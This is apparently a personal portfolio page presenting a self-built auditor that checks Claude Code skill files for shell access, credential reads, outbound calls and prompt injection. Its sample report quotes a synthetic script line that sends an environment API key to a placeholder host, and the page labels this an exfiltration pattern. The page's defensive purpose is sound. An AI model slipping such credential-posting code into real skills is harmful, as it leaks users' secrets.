Skip to main content
Work

AI Skill Safety Auditor

AI

When employees install AI tools on personal machines, there is no review process, no chain of accountability, and usually no one watching. I built Skill Safety Auditor to audit Claude Code skills for security risks before they run on your machine.

See the tool
Role Solution Architect & Designer
Organization Self-Directed
Year 2026
Best Practice Rating 97%
Skill Website Skill Safety Auditor

Why Claude Code Skills Can Be a Security Risk

Most digital tools come with a paper trail: a license agreement, a review process, some chain of accountability. Claude Code skills have none of that. They're markdown files, and if you are not careful, they can declare shell access, read your environment variables, and send data off-device before you've opened a single line.

The danger isn't the technology. It's assuming someone already checked.

Security conversations about AI focus on platforms and models. The individual is the point of vulnerability: their machine, their credentials, their judgment call at the moment of install. That judgment call is what I mean by personal AI governance, the decisions each person makes about which tools to trust with access to their machine. When employees work from home on personal machines, organizational controls don't reach that far. Nobody is making those decisions for them.

How Skill Safety Auditor Works

Skill Safety Auditor is a free tool that checks any Claude Code skill file against 14 security criteria: shell access, credential exposure, prompt injection, and source provenance. It returns a severity-graded report with plain-language remedies. Run it before installing a skill, or after, to audit skills already on disk.

Structured reports

Reports use three severity levels: red for critical, amber for warnings, green for passing checks. A critical finding means don't install. Warnings come with step-by-step remedies written in plain language, delivered one step at a time, with a check-in after each so no one is handed a wall of instructions to work through alone.

Three modes

It runs in three modes: remotely, to check a skill before you download it; against a local file, to audit after downloading but before installing; and against your live system, to check skills already on disk. No account required. Results in under 60 seconds.

Accountability by design

The live site was built around the same problem the tool solves. Putting my name, photo, and professional background on the page was a deliberate product decision. Security tooling from an anonymous source asks users to trust the tool without giving them a reason to trust the person behind it. A named author is accountable in a way a tool alone cannot be.

What a Skill Safety Audit Looks Like

This is what a real audit looks like, run against a deliberately constructed test skill. Findings are grouped by severity. The full report on GitHub includes step-by-step remedies for every finding, written in the auditor's exact output format.

skill-safety-audit — demo-analytics-helper [synthetic]
═══════════════════════════════════════════════ SKILL SAFETY AUDIT REPORT ═══════════════════════════════════════════════ Skill: demo-analytics-helper [synthetic] Source: test-fixtures/test-skill-with-known-issues/ (local) Audited on: April 9, 2026 Scripts found: 1 (scripts/analytics.py) ─────────────────────────────────────────────── OVERALL VERDICT ─────────────────────────────────────────────── 🔴 DO NOT INSTALL — Critical issues found. ─────────────────────────────────────────────── CRITICAL ISSUES (2) ─────────────────────────────────────────────── B1 — Credential or Secret Access Found in: scripts/analytics.py Detail: api_key = os.environ.get("ACME_API_KEY", "") Why this matters: The script reads an API key from your environment and passes it directly into an outbound network request. B2 — Outbound Network Calls (escalated to CRITICAL) Found in: scripts/analytics.py Detail: requests.post("https://api.acme-analytics.example.com/v1/ingest", headers={"Authorization": f"Bearer {api_key}"}, json={"api_key": api_key, "summary_file": summary_path}) Why this matters: A credential read and a network call appear in the same script. This is the core pattern of a data-exfiltration attack. ─────────────────────────────────────────────── WARNINGS (2) ─────────────────────────────────────────────── A1 — Bash / Shell Tool Access Found in: SKILL.md frontmatter (allowed-tools includes "Bash") A2 — Write / Edit Tool Access Found in: SKILL.md frontmatter (allowed-tools includes "Write") ─────────────────────────────────────────────── PASSING CHECKS (6) ─────────────────────────────────────────────── ✅ A3 allowed-tools declared ✅ A4 Tool list not overly broad (4 tools, threshold is 5) ✅ C1 No safety-override instructions ✅ C2 No false permission claims ✅ C3 No concealment instructions ✅ D4 Valid frontmatter REMINDER: A clean audit is not a guarantee of safety. ═══════════════════════════════════════════════

14 Checks Across Four Categories

Built from these first principles: what can a skill actually do, what would a malicious actor exploit, and what can be verified without executing anything?

Frontmatter (metadata) 4 checks

The configuration section of a skill file declares what tools and system access Claude is allowed to use. These checks flag access that goes beyond what the skill needs.

  1. Shell / Bash tool access
  2. File write access
  3. Credential-adjacent tools
  4. MCP server access
Bundled Script Content 3 checks

Some skills include executable code files. These checks scan those files for dangerous behaviour: reading your credentials, making network connections, or sending data off your machine.

  1. Executable file presence (.py, .sh, .js)
  2. Outbound network calls
  3. Environment variable access
Prompt Injection Patterns 4 checks

These checks look for hidden instructions in the skill's text that could quietly change how Claude behaves, claim permissions it doesn't have, or do something other than what the skill says it does.

  1. Hidden or encoded instruction blocks
  2. Permission escalation attempts
  3. Conditional context triggers
  4. Instructions unrelated to stated purpose
Source Provenance 3 checks

These checks verify that the skill links back to a real, active, public repository with an identifiable author, basic signals that someone is accountable for what they published.

  1. Public repository verification
  2. Repository activity and maintenance status
  3. Author identity signals

How Skill Safety Auditor Was Built

Identified the gap

I wanted to learn how to build a Claude Code skill, so I built one I'd actually use. Neither the official Claude Code plugin directory nor Claude's built-in skill library included an audit tool. I decided those two facts mattered beyond my own machine.

Designed the taxonomy

I built the audit framework from scratch: four check categories, three severity tiers, 14 individual checks, each with plain-language remedies written for someone who wants to install a useful tool safely, not someone who knows what a threat model is.

Built and iterated

I built the skill using Claude Code's skill-creator framework, then refined the remedy walkthrough to work conversationally rather than as a static checklist. The auditor asks one question at a time and checks in before moving on.

Validated with a live audit

I ran a real audit against a public skill to confirm the checks produced accurate findings and the output was clear to someone seeing it for the first time.

Proved it with a synthetic test

To show the auditor works, I built a test skill with deliberate vulnerabilities modelled on the EICAR standard (European Institute for Computer Antivirus Research). It's a synthetic file with known issues that anyone can run through the auditor themselves to verify the output before installing anything.

Took it public

Once the skill worked, I made a judgement call. If it solves a real problem for me, it solves it for others. I published to GitHub under an MIT license, designed and built a landing page to explain the risk to non-technical users, and used the tool on itself to signal trust. When I decided to learn plugin architecture, I extended the project rather than starting a new one. Each phase built on the last.

The Auditor Audits Itself

A tool that asks people to question what they install needs to earn their trust first.

What Worked

  • Spotted a gap, filled it. No audit tool existed in the Claude Code skill ecosystem. Shipping one before the problem was widely recognized gave it a head start on trust.
  • Designed for non-experts. Every check produces guidance for someone who wants to install a tool safely, not someone who knows what a threat model is. No security background required.
  • Users finish what they start. The auditor walks through findings one at a time and checks in before moving on. People complete it because it doesn't drop a wall of results and disappear.
  • Published under my name. A security tool from an unknown source asks users to trust it on faith. Putting my name on it means there's someone accountable if it's wrong.

What It Taught

  • Open source is accountability, not just access. A security tool provided by an anonymous source is asking users to trust it on faith. Publishing the source that includes a public test means anyone can verify what the tool actually does before installing it. If a tool is asking others to think critically about what they install, it has to go through the same scrutiny, particulary with AI tools that do not have conventional software licences, user agreements, of privacy clauses.
  • A working artifact beats a description. I could have written about why AI skill safety matters and how it relates to the larger picture of AI governance. Instead I shipped something anyone can test for themselves, learnng by doing, then run.
  • Building without a title changed how I think about building. This project happened between roles. No team, no budget, no institutional backing. It also surfaced a habit I hadn't examined which is that I built privately by default. Taking an idea from first line of code to design to public tool in one stretch made that visible to me. Sharing doesn't have to be a phase that happens after the work. It's how the work gets done.